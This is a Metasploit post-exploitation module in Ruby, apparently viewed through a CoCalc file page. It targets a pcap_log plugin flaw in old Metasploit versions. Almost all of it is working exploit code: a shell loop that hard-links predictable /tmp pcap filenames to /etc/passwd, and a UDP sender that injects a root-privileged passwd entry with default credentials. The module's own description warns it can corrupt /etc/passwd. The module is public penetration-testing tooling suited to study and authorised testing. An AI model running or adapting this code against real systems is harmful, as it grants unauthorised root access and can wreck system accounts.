CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  Rank = ManualRanking
8

9
  include Msf::Post::File
10

11
  include Msf::Exploit::Local::Linux
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        {
18
          'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
19
          'Description' => %q{
20
            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
21
            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
22
            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
23
            This, and all the other packets, are appended to /etc/passwd.
24

25
            Successful exploitation results in the creation of a new superuser account.
26

27
            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
28
            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
29
            a permanent DoS on the target by corrupting the /etc/passwd file.
30
          },
31
          'License' => MSF_LICENSE,
32
          'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
33
          'Platform' => %w[bsd linux unix],
34
          'SessionTypes' => [ 'shell', 'meterpreter' ],
35
          'References' => [
36
            [ 'BID', '54472' ],
37
            [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
38
            [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
39
          ],
40
          'DisclosureDate' => '2012-07-16',
41
          'Stance' => Msf::Exploit::Stance::Passive
42
        }
43
      )
44
    )
45
    register_options(
46
      [
47
        Opt::RPORT(2940),
48
        OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
49
        OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
50
        OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
51
      ], self
52
    )
53
  end
54

55
  def normalize_minutes
56
    datastore['MINUTES'].abs
57
  rescue StandardError
58
    0
59
  end
60

61
  def run
62
    print_status "Setting up the victim's /tmp dir"
63
    fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')
64
    initial_size = read_file('/etc/passwd').lines.count
65
    print_status "/etc/passwd is currently #{initial_size} lines long"
66
    i = 0
67
    j = 0
68
    loop do
69
      if (i == 0)
70
        j += 1
71
        break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
72

73
        # 0a2940: cmd_exec is slow, so send 1 command to do all the links
74
        print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
75
        cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
76
      end
77
      current_size = read_file('/etc/passwd').lines.count
78
      if current_size == initial_size
79
        # PCAP is flowing
80
        pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
81
        vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
82
        udpsock = Rex::Socket::Udp.create(
83
          {
84
            'Context' => { 'Msf' => framework, 'MsfExploit' => self }
85
          }
86
        )
87
        res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
88
      else
89
        break
90
      end
91
      sleep(1) # wait a second
92
      i = (i + 1) % 60 # increment second counter
93
    end
94

95
    if read_file('/etc/passwd').includes?('Metasploit')
96
      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
97
      # TODO: Consider recording our now-created username and password as a valid credential here.
98
    else
99
      print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
100
    end
101
    # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
102
    #	  However beceause the session is not a terminal, su will not always allow this.
103
  end
104
end
105

106